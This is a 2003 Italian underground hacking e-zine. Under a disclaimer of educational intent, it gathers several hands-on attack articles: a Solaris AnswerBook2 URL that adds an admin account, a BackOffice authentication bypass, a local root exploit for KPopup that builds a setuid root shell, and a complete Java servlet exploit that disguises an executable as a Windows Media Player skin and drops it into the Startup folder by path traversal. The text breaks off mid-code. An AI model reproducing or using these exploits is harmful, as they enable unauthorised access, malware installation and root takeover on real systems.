+==============================================[ INFORMAZIONELIBERA E-ZINE®05 ]+ |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | <<<---------------------------------->>> | | >>> Italian Underground crew <<< | | <<< INFORMAZIONELIBERA® >>> | | >>> +ST4M>P4-UN|D3RGR0:UN>D+ <<< | | >>> E-zine 05 <<< | | >>>----------------------------------<<< | | | | ... combattiamo l'ignoranza informatica | | L'HACKING NON E' UN CRIMINE! E' CONOSCENZA | | | |+============================================================================+| |+[ http://www.informazionelibera.cjb.net ~ http://www.informazionelibera.tk ]+| |+========[ mailto: cyberdudeIL@libero.it or cyberdudemail@libero.it ]========+| |+============================================================================+| +------------------------------------------------------------------------------+ | Il sEsTo nUmErO DeLlA E-ZiNe rIgUarDAnTe l'uNdErGRoUnD ItAlIaNo NeL MoNdO | +------------------------------------------------------------------------------+ +------------------------------------------------------------------------------+ | ©Copyright Informazionelibera E-zine® 6°edizione Novembre 2003 | +------------------------------------------------------------------------------+ [ DiSCLAiMER ]-----------------------------------------------------------------+ |Nota bene: Informazionelibera non si riterrà responsabile di eventuali danni | |provocati dal cattivo utilizzo delle notizie presenti in questa e-zine!tutti | |gli articoli sono scritti a scopo dimostrativo con l'intento di spiegare | |e approfondire conoscenze informatiche. Qualsiasi uso illecito delle info | |presenti nella e-zine è responsabilità del fautore di tale inflazione | +------------------------------------------------------------------------------+ [ CoStItUzIoNe dElLa rEpUbBlIcA ItAlIaNa ]-------------------------------------+ |Diritti e doveri dei cittadini: Rapporti civili | |Articolo 21 | |Tutti hanno diritto di manifestare liberamente il proprio pensiero cone la | |parola , lo scritto e ogni altro mezzo di diffusione. [...] | +------------------------------------------------------------------------------+ +------------------------------------------------------------------------------+ |[ iNDiCE ]=[ IL05 ]======================================[ 34 articoli ]======| |---[ INFO E-ZINE ]------------------------------------------------------------| |------[ Editoriale ]---------------------------------------------[ Unrelated ]| |---[ HACKiNG ]----------------------------------------------------------------| |------[ Solaris AnswerBook2 vulnerabile con una stringa ]--------[ Cyberdude ]| |------[ Win media player, utilità o trojan?? ]-------------------[ Cyberdude ]| |------[ BackOffice cresce e arriva a 4.5! Si ma... ]-------------[ Cyberdude ]| |------[ Come ottenere privilegi ellevati tramite KPopup ]-----------[ Marsio ]| |------[ Piccolo Bug Di Kazaa ]---------------------------------[ LordScinawa ]| |------[ L'indiano buggato ]-------------------------------------------[ Korn ]| |------[ HTML Injection, come, dove e perchè ]----------------------[ Bigalex ]| |------[ Webmail di Flashnet.it ]---------------------------------[ Unrelated ]| |------[ Packet Injection (Internet Direct Attack) ]-------------------[ Evil ]| |---[ OVERCLOCK ]--------------------------------------------------------------| |------[ Scendere a Ring Zero in Windows9x ]----------------------[ active85k ]| |------[ Da Duron a Athlon XP ]-----------------------------------[ Cyberdude ]| |---[ PROGRAMMAZIONE ]---------------------------------------------------------| |------[ Algoritmi genetici Parte Prima ]-------------------------[ Imperiorx ]| |------[ Object Oriented Programming ]--------------------------[ SysOv3rrid3 ]| |------[ open() e sysopen() in Perl ]---------------------------------[ f4ke^ ]| |------[ Tutorial 4 Turbo Pascal ]-----------------------------------[ Eimiar ]| |------[ Crypter in Turbo pascal conveniente ]-----------------------[ Eimiar ]| |------[ Ascii Taker ]-----------------------------------------------[ Eimiar ]| |---[ MIRC SCRIPTING ]---------------------------------------------------------| |------[ Grafica in mirc ]---------------------------------------[ Blacksword ]| |---[ LINUX ]------------------------------------------------------------------| |------[ How to: Punguin's Fdisk ]-----------------------------------[ Native ]| |------[ RtLinux e le applicazioni realtime ]------------------------[ Marsio ]| |---[ CRACK , REVERSING & CRITTOGRAFIA ]---------------------------------------| |------[ RSA defeating 'n reversing ]-------------------------------[ Evilcry ]| |------[ WinImage 6_10 ovvero uno schema di protezione deludente ]--[ Evilcry ]| |------[ Fant0m Crackmes Reversiamoli tutti e cinque + Autokeygen ]-[ Evilcry ]| |------[ Detten12 reversing ]---------------------------------------[ Evilcry ]| |------[ Genetic Algorithms an overview #1 ]------------------------[ Evilcry ]| |------[ Trasformiamo un crackme in un generatore di chiavi! ]----[ active85k ]| |------[ Serial Fishing Popup Sweeper ]-----------------------------[ Graftal ]| |---[ NETWORKING & SIMILI ]----------------------------------------------------| |------[ Apriamo Fastweb ]-------------------------------------------[ Tailot ]| |---[ FOR NEWBIE ]-------------------------------------------------------------| |------[ Pizza con smurf ben cotto, grazie ]--------------------[ LordScinawa ]| |------[ Irc Mirc e il suo DCC buggato ]--------------------------[ Cyberdude ]| |---[ RECENSIONI ]-------------------------------------------------------------| |------[ 64bit-The revolution is begining ]---------------------[ SysOv3rrid3 ]| |---[ ESPERIMENTI ]------------------------------------------------------------| |------[ Rapporto 6266 in T9 ]------------------------------------[ Unrelated ]| |---[ FILOSOFIA HACK ]---------------------------------------------------------| |------[ Cosa comportano i nuovi piani tariffari ]------------------[ Bigalex ]| |------[ Classifiche siti taroccabili ]------------------------------[ Tailot ]| |---[ ERRORI NEL NUMERO PRECEDENTE ]-------------------------------------------| |------[ Erroraccio ]------------------------------------------------[ Eimiar ]| |[ EnD ]=======================================================================| | _________________________________________________________| |____________________/… Questo numero della e-zine è dedicato interamente | | agli italiani morti inutilmente in IRAQ! Per non dimenticare che la guerra | | non serve a niente e provoca solo male e distruzione a tutti !! Basta fare | | la guerra!! ... ONORE AI CADUTI !!! | +------------------------------------------------------------------------------+ +--------------------------------------------------------------[open the file]-+ |[ INFO E-ZINE ] | |-- Editoriale | |-- Unrelated | | _________________________________________________________| |____________________/ ehm ehm... Venghino signori ad udir dei bei articoli, tecniche, brutti ceffi ed innovazioni... ehm no così forse è un pò arcaico... cominciamo l'editoriale in questo modo... (Intanto mi scolo una mezza macchinetta di caffè perchè sto morendo dal sonno)... va bè.. allora... (un attimo che finisco di delirare e inizio) ecco.. ecco.. Un ragazzo\a come tutti gli altri va a scuola, fa un pò il cretino con le ragazze e scherza con i suoi amici, poi di ritorno a casa mangia come sua consuetudine, e poi entra in un universo parallelo. Così sintetizzato voi lettori potete credere che sono troppo imbevuto di matrix e delle sue baggianate intergalattiche, ma se osservate attentamente quello che creiamo noi, rispetto alla massa, capirete sicuramente che siamo proiettati in una diversa prospettiva mentale; mentre gli altri si mangiano il pane con la nutella noi ci montiamo una lan e facciamo prove sui nostri 2 o + computer per trovare qualche possibile vulnerabilità e metre bestemmiamo zeus del perchè non funge un exloit, passa vostra nonna e vi dice : <>, dobbiamo pensare che molte persone della vecchia generazione e della nascente, da quello che ho potuto notare, hanno paura del monitor e della tastiera, credono sia qualcosa di sovraumano, misterioso, bislacco... in effetti per loro è tale realmente; quando sentono la parola computer spalancano gli occhi quasi come in preda al panico, essendo allo stesso tempo illuminati e impauriti da ciò che non sanno... ma noi? beh.. noi viviamo paralleli in due mondi, abbiamo due cervelli, due conoscenze, quando siamo soli con la macchina ci dimentichiamo del mondo intorno, e cerchiamo di modificare il nostro mondo virtuale, stiamo ore davanti alla macchina con la luce del monitor che ci brucia gli occhi a tal punto che molti di noi hanno gradi di miopia che oscillano, come una colonnina di mercurio a marzo, dal 3 al 7. Nonostante questo prima di tutti gli altri abbiamo intuito che oltre alla vita reale c'è qualcosa di più, una vita fatta di numeri, di lettere, di variabili, di linguaggi che viene condivisa con il gruppo, nel quale ognuno di noi battito dopo battito, attraverso la tastiera, scandisce il tempo della sapienza in una dimensione subnaturale, ma che a noi non è estranea. Noi in questo giornale non facciamo nient'altro che raccontare questa vita, questo modo di vivere anticonformista, oserei underground digitale. Ma infondo siamo dei bambini curiosi, che si fanno mille perchè tra di loro. Siamo persone matte, depresse, psicopatiche, perverse, autistiche, isolate ma felici; che più sanno, più hanno il gusto di sapere. Abbiamo bisogno della conoscenza perchè la notte non riusciamo a dormire senza, peggio di una droga, peggio di una ragazza\o che ci fa impazzire, questa cosa si chiama passione. Siamo in bilico, tra un baratro di oscurità e un tunnel di luce, basta che la presa sia staccata e noi smettiamo di esistere, barcolliamo nel buio finchè la ventola non si riaziona. 1 2 3 via.. correte verso l'impossibile, perchè l'impossibile siamo noi, umili studiosi, cacciatori di verità, filologi di linguaggi obsoleti. Tra queste parole che dalla mia mente confluiscono sulla tastiera, avrei moltissime cose da raccontarvi, ma solo una sintetizza tutte le altre nel volermi congedare da voi membri: << ciao ragà! Grazie di tutto> e a voi lettori << buona lettura e fateci pubblicità ;-) >>, ricordandovi che siete sempre i benvenuti nel nostro canale. N.B. Ciao ragazzi sono Cyberdude ... approfitto di questa presentazione della e-zine per precisare una cosa : il Korn che è andato via (leggi la storia di IL) non è la stessa persona che collabora ora con noi!! Lo dico perchè alcuni lettori si son accaniti contro quest'ultimo !! Vi ricordo che ognuno ha la libertà di fare ciò che vuole ... ognuno pensa con la proprio testa ok?? Lasciamo la libertà di scelta agli altri! ora vi lascio alla lettura della e-zine ciao a tutti +--------------------------------------------------------------[open the file]-+ |[ HACKiNG ] | |-- Solaris AnswerBook2 vulnerabile con una stringa | |-- Cyberdude | | _________________________________________________________| |____________________/ Buona sera ragazzi… 21 ottobre 2003 ore 20:24 sto nello studio ascoltando Articolo31 – Voglio una lurida oppure Tocca qui hhehehe che pezzo!! Dovreste sentirvela ti da la carica … e mi ci vuole proprio perché ancora una volta non ci siamo visti!!! Ma quando viene il giorno che mi piglio la patente?? comunque vabbè a voi che ve ne frega? Non lo so e sebbene mi abbiano detto più persone di non parlare dei miei cazzi negli articoli che scrivo non riesco a farne a meno hihihi quindi se volete leggere i miei articoli beccatevi pure un po’ di sti cazzi miei!! Comunque da questo momento in poi comincia il vero e proprio articolo promesso!! Ok?? START hihihi signore e signori, ledies and gentleman (non so se si scrive così … non sono un mostro in inglese) ecco a voi Cyberdude e Solaris AnswerBook2 Interfaccia per l’accesso dell’amministrastore … ma che cazzo ho detto?? Non lo so… so solo che stasera sto a metà tra il nervosismo cronico e lo stress, comunque in pratica l’articolo parla di solaris come avete potuto capire dal “titolo” !!! Dunque visto che io non sono molto bravo a scrivere le recensioni passo parola ai rappresentanti Microsoft che meglio di me sapranno presentarvi il loro prodotto… hihihi tanto io vi devo solo spiegare come sfruttare un'altra vulnerabilità dovuta all’inettitudine di questi … comunque più ne parliamo più facciamo sentire la nostra voce, più si decidono a farci un software più sicuro giusto?? Si credo proprio di si!! Dunque la microsoft (per la microsoft intendo i rappresentanti che ne parlano su reti nazionali televisive e ne scrivono sui siti) dice così : L'ambiente Solaris(TM) è basato sull'interfaccia grafica utente OPEN LOOK©… al che aggiungono ancora : costituito dall'ambiente OpenWindows e dalle applicazioni DeskSet. Le applicazioni DeskSet sono un insieme di programmi standard, tra cui un'applicazione di posta elettronica e un editor di testo. Per iniziare una sessione di lavoro è necessario effettuare il login. La procedura di login permette al sistema di identificare l'utente e le sue autorizzazioni. Al termine della sessione occorre invece eseguire il logout, per impedire l'accesso ai propri file da parte di utenti non autorizzati!! In pratica se questi usano paroloni troppo grossi, vi faccio io il succo della situazione, la procedura di login permette al sistema di identificare l'utente quando entra in Solaris e le sue rispettive autorizzazioni… quando poi abbiamo finito di fare i nostri porci comodi ci viene calorosamente raccomandato di eseguire la il logout … ma che vorrà mai dire?? Provate a indovinare!!!In questo modo si rende il sistema disponibile per l'accesso di altri utenti! Tutto chiaro? Wow a leggere una cosa del genere si direbbe … che bel pezzo di OpenWindows (giusto per rimanere in tema) … poi il lettore continua con questo articolo e scopre che anche questa volta il buon vecchio volpone dello zietto Bill Gates ha toppato!! Ma questo tutti sti miliardi come se li è fatti?? Vabbè non ne voglio parlare troppo male visto che io uso WinXP hihihih il sistema + baggato del secolo (dopo Win Millenium)!! Comunque veniamo al dunque, visto che ho ancora pochissimo tempo a disposizione, altrimenti mi sarebbe piaciuto davvero molto rimanere qui a scrivere iihihihi … ok faccio il serio! Dunque parlo di AnswerBook2 versioni 1.4.2 (e precedenti) , che succede?? Diciamo solo che non è molto sicura l’identificazione in quanto i controlli sono molto terra terra!! Qual è il vantaggio? Il nostro vantaggio? È semplice… a causa di questo erroraccio, chiunque può crearsi un account da amministratore sul sistema! Bella cacchiata vero? E scusatemi se lo ripeto ma voglio che le cose siano chiare… chiunque può farlo. Basta semplicemente accedere tramite lo script /cgi- bin/admin/admin presente sotto il web server AnswerBook2 dwhttpd!! A questo punto chi vieterebbe ad un aggressore di leggere i file di registrazione, farsene quello che ritiene più idoneo al suo scopo e gestire il contenuto per scopi propri?? Beh direi nessuno … adesso suppongo che vogliate anche che vi riporti un esempio in modo da non lasciare l’articolo incompleto e tutte queste parole inutilmente sprecate! Vero? Ok … vi riporto questa stringa un po’ lunghetta e vi do appuntamento alla proxima volta ;) http://www.example.com:8888/cgi-bin/ admin/admin?command=add_user&uid=percebe&password=percebe&re_password=percebe Ragazzi non è un sito … sia chiaro hihihih è un esempio, adesso se avete capito almeno un minimo di tutte queste cazzate che ho sparato in questa fredda sera d’autunno direi che avete capito che dovete applicare l’esempio sul vostro buon vecchio Solaris … fatemi sapere se ne avete trovato qualcuno e soprattutto se questo “articoletto” è servito a qualche cosa ok?? Ora ci metto un punto perché sono le 20:55 (cavolo quanto ci ho messo hihihi). Ora vado di la mi metto il pigiama bello calduccio, mi infilo nel letto e chiamo Lory (e che vuoi di più dalla vita uno squallido Martedì sera?… e non mi rispondete un Lucano che vi pesto!) Ciao a tutti Cyberdude [INFORMAZIONELIBERA FOUNDER] mailto : cyberdudemail@libero.it ~ cyberdudeIL@libero.it website : http://www.informazionelibera.cjb.net ~ http://www.area91.da.ru (ma questo non è molto aggiornato, è il mio vecchio sito che ormai non aggiorno neanche più, ma vi consiglio di visitarlo, non è niente male) ps… ragazzi se ci sono gravi errori (di qualsiasi tipo) vi prego di scusarmi ma non è serata e ho scritto tanto per svagare un po’ con le cervella!! Ok?? Può darsi pure che ho scritto solo un mucchio di cazzate senza senso … poi domani lo rileggo, comunque stasera l’articolo è questo! Hahaha ciao ;) +--------------------------------------------------------------[open the file]-+ |[ HACKiNG ] | |-- Win media player, utilità o trojan?? | |-- Cyberdude | | _________________________________________________________| |____________________/ Caspita… sembra proprio che con tutto questo popò di articoli c’è qualcuno che viene a leggere qualcosa scritto da me !! Grazie mie fedeli lettori, vi voglio bene! Eheheh Dunque 22:51 di Domenica 26 ottobre 2003 situazione alquanto tranquilla, meno di 55 secondi fa ero a tel con la mia ragazza (sapete com’è) adesso sono qui avanti al pc senza uno scopo preciso, la situazione è sempre la stessa… che cazzo l’acqua non c’è … ditemi voi se nel 2003 per lavarci dobbiamo prendere l’acqua dal frigo e riscaldarla nel microonde ma che vita di merda ahhehehe!! Comunque a finale i progressi ci sono sempre, e a proposito di progressi voglio parlarvi di un progresso firmato zio billtiello gates (marchi microsoft) … ora voi direte eh ti pareva che cyberdude non si accanisce contro la microsoft! Alcuni di voi penseranno che tenga come sfondo la faccia di Bill Gates nel cartello di divieto! E invece ho un bel WinXP con tanto di Microsoft Word sul quale scrivo ma … che ci volete fare, la microsoft è tanto cara quanto bucata hehehe eh si fa acqua da tutte le parti! La volete sapere l’ultima? Per gli amanti delle falle eccovi una chicca ;) Sono risultati vulnerabili a questo problemino : Microsoft Windows Media Player XP + Microsoft Windows XP Home + Microsoft Windows XP Professional & Microsoft Windows Media Player 7.1 - Microsoft Windows 98 - Microsoft Windows ME - Microsoft Windows NT 4.0 - Microsoft Windows NT 4.0 SP1 - Microsoft Windows NT 4.0 SP2 - Microsoft Windows NT 4.0 SP3 - Microsoft Windows NT 4.0 SP4 - Microsoft Windows NT 4.0 SP5 - Microsoft Windows NT 4.0 SP6 - Microsoft Windows NT 4.0 SP6a Mentre invece sono immuni al problema : Microsoft Windows Media Player 9.0 + Microsoft Windows Server 2003 Datacenter Edition + Microsoft Windows Server 2003 Datacenter Edition 64-bit + Microsoft Windows Server 2003 Enterprise Edition + Microsoft Windows Server 2003 Enterprise Edition 64-bit + Microsoft Windows Server 2003 Standard Edition + Microsoft Windows Server 2003 Web Edition Detto questo proporrei di passare ad esaminare il problema … che succede questa volta?? Dunque sicuramente avrete capito che stiamo parlando di Windows Media Player, e molti di voi sapranno sicuramente cosa sia uno skin!! Per i pochi che non lo sanno skin in italiano si traduce con la parola pelle e vuol dire in pratica la grafica del programma… Si perché noi possiamo andare su Selezione interfaccia (in basso sulla colonna di sinistra) e poi cliccando in alto su Altre interfacce … che succede? Scegliamo la “pelle” che più ci piace per il Media Player e questo da solo e automaticamente lo scaricherà e istallerà per noi!! Ora quello che il mio cervelletto è andato a pensare è la seguente cosa: mettiamoci nei panni di un hacker o di un buon furbacchione… come farebbe per sfruttare al meglio questa bufalata?? Così mi son detto … se io prendo un programma (che esso sia un virus, un trojan, una foto o un qualunque altra cosa) e faccio credere a media player che invece è uno skin …questo direttamente lo scaricherà e lo istallerà per me!! Grazie zio Bill sei un genio!! Non so se queste cose le fai appositamente per gli smanettoni o se invece ti vengono naturali comunque alla fine, come la metti metti che ci va a guadagnare siamo sempre noi!! Quindi abbiamo detto che se facciamo credere, se riusciamo ad illudere il mediaplayer che quello che vogliamo fargli scaricare è uno skin questo fa tutto da solo senza che l’utente ci metta il dito… il poverino ignaro crede di prendere uno skin e invece si ritrova istallato un virus!! Aaiaiaiaaiiaai … Adesso sono un po’ indeciso se spiegarvi o meno come fare a sfruttare tale funzione, da una parte penso… beh i programmatori lo sanno fare lo stesso e non credo che si mettono a fare i lamerozzi!! Ma se poi lo allego e qualche lamer sfrutta il sorgente?? Eh qui so cavoli… allora penso no… non metto niente! Però poi me li vedo gia tutti i miei lettori newbie dinnanzi a questo testo che dicono: siamo arrivati fin qui e ora?? Ci abbandoni così?? No non posso abbandonarli!! Dopotutto io mi batto per diffondere l’informazione liberamente… quindi preciso che non voglio assolutamente che qualcuno usi queste info per creare macelli!!! Ragazzi lo studio del sorgente che vi allego di seguito deve essere solo qualcosa che vi aiuti a capire come è possibile sfruttare tale bug, non deve essere un’arma (scritta da altri… quindi è pure poco professionale) per dar fastidio agli altri!! Ok??? Vabbè mi fido di voi, questo sorgente è un file .java!! Originariamente non era concepito per essere sfruttato su computer italiani in quanto aveva solo configurazione per computer inglesi e tedeschi… ma io mi son detto eh noi stiamo in Italia, che facciamo?gli italiani non lo possono usare? Eheheh eh no!!! E allora l’ho modificato (anche se a dire il vero dovrei vantarmene poco perché si tratta di aggiungere una stringa) comunque era giusto per dire che ci ho messo uno zampettino anche io!! Eheheh con questo vi saluto e vi do appuntamento al prossimo articolo !! cià wagliù -[ TAGLIA QUI ]------------------[ WinMediaPlayerExploit.java ]----------------- import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.ServletException; import javax.servlet.ServletOutputStream; import java.io.*; public class MediaPlayerExploit extends HttpServlet { private static final int BUFFER_SIZE = 1024; private static final String[] paths = new String[] { "%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CMenu Avvio%20Menu%5CProgrammi%5CEsecuzione automatica%5c", // Italiano "%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup%5c", // English "%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CMenu Start%5CProgramma%27s%5Copstarten%5c" // Dutch }; private String payload; public void init() throws ServletException { payload = getInitParameter("executable"); } public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { int language = 0; // default to english try { language = Integer.parseInt(request.getParameter("language")); } catch (NumberFormatException ignored) {} String path = paths[language]; File file = new File(payload); ServletOutputStream sos = response.getOutputStream(); response.setContentType("application/download"); response.setHeader("Content-Disposition","filename=" + path + file.getName() + "%00.wmz"); BufferedInputStream bis = new BufferedInputStream(new FileInputStream(file)); BufferedOutputStream bos = new BufferedOutputStream(sos); byte buffer[] = new byte[BUFFER_SIZE]; int datalength = 0; while ( (datalength = bis.read(buffer,0,BUFFER_SIZE)) > 0) { bos.write(buffer,0,datalength); } bis.close(); bos.close(); } public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { doGet(request, response); } } ----[ TAGLIA QUI ]-------------------------------------------------------------- Piccoli accorgimenti dopo-articolo : 1. Ringrazio Brnocrist per avermi fornito il compilatore Java (altrimenti come facevo a provare l’exploit??) 2. Ringrazio Giupo per avermi aiutato a risolvere il problema della Class Java … Riguardo al problema 2 potrebbe capitare a chiunque che andando a compilare il file java vi da alcuni errori relativi alla mancanza delle class iniziali : import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.ServletException; import javax.servlet.ServletOutputStream; Come si risolve il problema?? Bisogna aggiungere al classpath di compilazione $J2EE_HOME/lib/j2ee.jar . A riga di comando -classpath $CLASSPATH:%J2EE_HOME/lib/j2ee.jar:.: ok??? Ora vi saluto tutti … alla prossima Cyberdude +--------------------------------------------------------------[open the file]-+ |[ HACKiNG ] | |-- BackOffice cresce e arriva a 4.5! Si ma... | |-- Cyberdude | | _________________________________________________________| |____________________/ Salve miei cari lettori, ancora una volta ho ben poco da fare, fuori fa un freddo cane, sono appena tornato da casa di Nicoletta per una giornata all’insegna della matematica e della geografia astronomica!!! Basta, ho mal di testa! Mi ci vuole una pausa (hehehe gia pensavate tutti alla pubblicità) … comunque non ho niente di tanto interessante per le cervella da dire! Anzi devo ammettere che in quest’ultimo periodo sto un po’ a scarso di idee, wagliù aiutatemi voi, mandatemi qualche mail e ditemi che posso scrivere ok??? Bene comunque non vi preoccupate non vi lascerò a bocca asciutta oggi vi parlo di backoffice! Anzi non ve ne parlo io, lascio che gli esperti delle recensioni parlino per me, poi dopo vi spiego che ce ne possiamo fare di queste info ok??? Bene leggiamo : -------------------------------------------------------------------------------- BackOffice cresce e arriva a 4.5 E’ disponibile la versione 4.5 di due delle applicazioni server integrate che costituiscono la famiglia Microsoft BackOffice: BackOffice Small Business Server e BackOffice Server. BackOffice è la soluzione progettata da Microsoft (tel. 0270398398, www.microsoft.com/italy) per offrire in un unico pacchetto tutte le funzionalità di elaborazione distribuita basata su Windows NT Server 4.0, e contiene tutte le componenti server applicative che estendono le funzionalità di NT Server 4.0 verso il client/server. Tra i vantaggi offerti da BackOffice ci sono la possibilità di reperire le informazioni ovunque queste si trovino (server NetWare, Apple Macintosh, sistemi Unix, ecc.), l’accesso tramite un’unica password a tutte le funzionalità della soluzione, l’interfaccia aperta per l’integrazione con altre applicazioni basate su standard e le estensioni Internet contenute in Internet Information Server. Small Business Server viene definita come la soluzione di rete per le piccole aziende che vogliono condividere e scambiare facilmente informazioni con partner e clienti: offre, oltre al server applicativo e di rete Windows NT Server 4.0, un sistema per la messaggistica interna ed esterna, un database relazionale, l’accesso a Internet, servizi di condivisione di fax e modem e una console di amministrazione. Si tratta per sua natura di una soluzione particolarmente interessante per il mercato italiano, costituito in gran parte da piccole imprese. Il nostro Paese si è infatti dimostrato così ricettivo nei confronti di questa soluzione che per Microsoft, in questo particolare segmento, rappresenta il terzo mercato a livello mondiale dopo USA e Gran Bretagna: nell’anno fiscale 1998 sono state vendute in Italia 2 mila licenze server e 30 mila licenze client di SBS. Le novità che offre la nuova versione del pacchetto comprendono anzitutto il numero massimo di licenze client, che è stato portato da 25 a 50; le nuove applicazioni sono Internet Information Server 4.0 (per la creazione di siti Web professionali), SQL Server 7.0 (consente di creare più database SQL 7.0 con un limite di 10 GB ciascuno), Exchange Server 5.5 (server di messaggistica e collaborazione), Outlook 2000 (per gestire i messaggi, gli appuntamenti, i contatti e le attività), Proxy Server 2.0 (un gateway sicuro verso Internet), FrontPage 98 (per creare e gestire siti Web senza programmazione). Numerose altre applicazioni che fanno parte di BackOffice SBS sono state invece migliorate. Un’altra novità che è stata introdotta con la versione 4.5 è il Migrate User Wizard, che rende rapida e semplice la migrazione da Windows NT Server a Small Business Server. La versione di aggiornamento di BackOffice Small Business Server 4.5 sarà inviata gratuitamente, al momento del suo rilascio, agli utenti che possiedono la licenza per la versione 4.0. La versione 4.5 non sarà localizzata ma verrà resa disponibile la documentazione in italiano; completamente tradotta, invece, sarà la successiva versione 5.0. Anche BackOffice Server, che copre la fascia media dell’offerta BackOffice ed è destinato principalmente alle filiali, ai dipartimenti e alle medie imprese, ha riscosso un notevole successo: secondo Microsoft le vendite sono decuplicate negli ultimi 18 mesi, e in Italia ne sono state vendute 42 mila copie nell’anno fiscale 1998. Tra le novità della release 4.5 si può citare uno script di setup riutilizzabili, che consente di replicare la configurazione di un singolo server su quelli delle filiali, aiutando a mantenere la coerenza delle configurazioni e a contenere i costi di gestione. L’installazione risulta semplificata anche grazie all’aggiornamento del setup, che integra le procedure di configurazione per SNA Server, Systems Management Server e Site Server. Gli scenari di setup sono opzioni di configurazione predefinite: una volta scelto un particolare scenario, BackOffice Server indica i componenti e i service pack da installare per quella soluzione. La nuova release introduce lo scenario "Branch Office", che si aggiunge alle opzioni esistenti. Altre novità sono la To Do List relativa alle attività di post-setup e l’upgrade automatico di BackOffice Small Business Server alla versione 4.5. Ridotti i costi amministrativi delle licenze grazie a un’unica licenza per tutte le componenti installate su un singolo server. A seconda delle loro esigenze, gli utenti possono usare tutte le componenti o solo alcune di esse. -------------------------------------------------------------------------------- Quella che avete appena letto è una bella e dettagliata spiegazione reperibile on-line … quello che state per leggere è un’altra informazione reperibile solo in questo articolo (o forse anche da qualche altra parte che ha letto qui e l’ha riportato o semplicemente lo ha gia scritto prima di me… comunque non badiamo a queste casualità)!!! Comunque dov’è il punto? Il punto è che sia Microsoft BackOffice 4.0 che Microsoft BackOffice 4.5 su Microsoft Windows NT 4.0 sono vulnerabili facilmente!! … questo articolo lo voglio dedicare a un ragazzo che incontrai l’altra volta in chan, aveva imparato come hackerare con FrontPage da un articolo e mi disse che era capace di entrare nel mio PC con Netbus e che quindi dovevo stare attento a lui perchè era un hacker!! Amico mio essere hacker non vuol dire saper usare Netbus, essere hacker vuol dire anche usare il buon vecchio caro amico nostro chiamato CERVELLO … di tecniche per hackerare ce ne sono milioni e milioni, basta solo usare il cervello e cercare di sfruttare le info che si hanno come meglio possiamo ok??? Scusate questa breve parentesi ma mi sentivo di esprimere questo giudizio in quanto con mio rammarico devo ammettere che IRC pulula di “HACKER” che ti minacciano con il netbus!! Vabbè basta! Non capisco perchè i miei articoli escono sempre fuori traccia!! Heehheh non riesco a seguire un filo logico, voi poverini che leggete siete costretti a sottolineare i soli concetti fondamentali!! Scusatemi ma sono fatto così!! Eheheh dunque a conclusione quello che voglio dirvi è che è possibile che utenti non autorizzati possano scavalcare l’autenticazione dell’host di Microsoft BackOffice… come?? Semplice … basta inviare una richiesta HTTP direttamente al services.asp (Boadmin/Backoffice/Services.asp) per scavalcare lo schermo di login e il gioco è fatto… siamo dentro eheheh tutto qui!!! Si ragazzi 3 ore di testo … tutto sto bordello per dirvi in 4 parole che se aprite Boadmin/Backoffice/Services.asp evitate la schermata dove vi chiede di autentificarvi e entrate direttamente nel service.asp!!! sono bastardo lo so, vi dovevo fare una capa tanta di cazzate!! Hehehe scusatemi ma ricordate che vi voglio bene!!! Per le vostre considerazioni, insulti, parolacce, potete inviarmi una mail … qualsiasi commento sarà gradito davvero!! Me lo merito dopo che vi tengo ore e ore a leggere! Ciao wagliù un saluto dal vostro Cyberdude ;) alla prossima !!! [ 4 Novembre 2003 ] +--------------------------------------------------------------[open the file]-+ |[ HACKiNG ] | |-- Come ottenere privilegi ellevati tramite KPopup | |-- Marsio | | _________________________________________________________| |____________________/ Come ottenere privilegi ellevati tramite KPopup ================================================ KPopup è un programma KDE che permette di mandare e ricevere messaggi MS Windows WinPopup. Una vulnerabilità che spiegherò qui di seguito permette di ottenere privilegi elevati. L'applicazione usa la chiamata system() che viene considerata pericolosa specialmente sui setuid root binaries. Esistono anche dei bug sulle format string nella funzione sprintf(), in questo articolo però mi fermerò a spiegare come ottenere privilegi root sfruttanto la vulnerabilità nell'applicazione system(). Ci sono 3 luoghi nel sorgente misc.cpp dove viene usato system(), una possibilità per exploitare questa vulnerabilità arriva nella line 106: void sendSignalForNewMessage() { char command[50]; sprintf(command, "killall -USR1 kpopup"); system(command); } Abbiamo bisogno di una shell script e di una chiamata al killall nella directory /tmp. Ecco un esempio di come sfruttare questa vulnerabilità: #!/bin/sh cd /tmp /bin/cat > shell.c << EOF #include int main() { setuid(0); setgid(0); execl("/bin/bash", "-bash", NULL); return 0; } EOF /usr/bin/gcc /tmp/shell.c -o /tmp/shell /bin/chown root.root shell /bin/chmod 6711 shell echo "NOW HERE IS YOUR ROOT SHELL" /tmp/shell Dopo aver creato il file nella cartella /tmp, killall e chmod +x, l'unica cosa che ci resta da fare è la seguente: export PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin export PATH=$PATH:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin : Una volta fatto questo, il gioco è fatto! otterremmo il seguente: /usr/local/kde/bin/kpopup root shell Come possiamo notare ora abbiamo privilegi root. Riporto di seguito il codice dell'exploit: /*Local root exploit for kpopup *by b0f www.b0f.net */ #include int main() { setenv("PATH=/tmp:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:\ /usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/root/bin:"); FILE *fd; fd = fopen("/tmp/killall", "w");{ fprintf(fd, "#!/bin/sh\n"); fprintf(fd, "cd /tmp\n"); fprintf(fd, "/bin/cat > shell.c << EOF\n"); fprintf(fd, "#include \n"); fprintf(fd, "int main()\n"); fprintf(fd, "{\n"); fprintf(fd, "setuid(0);\n"); fprintf(fd, 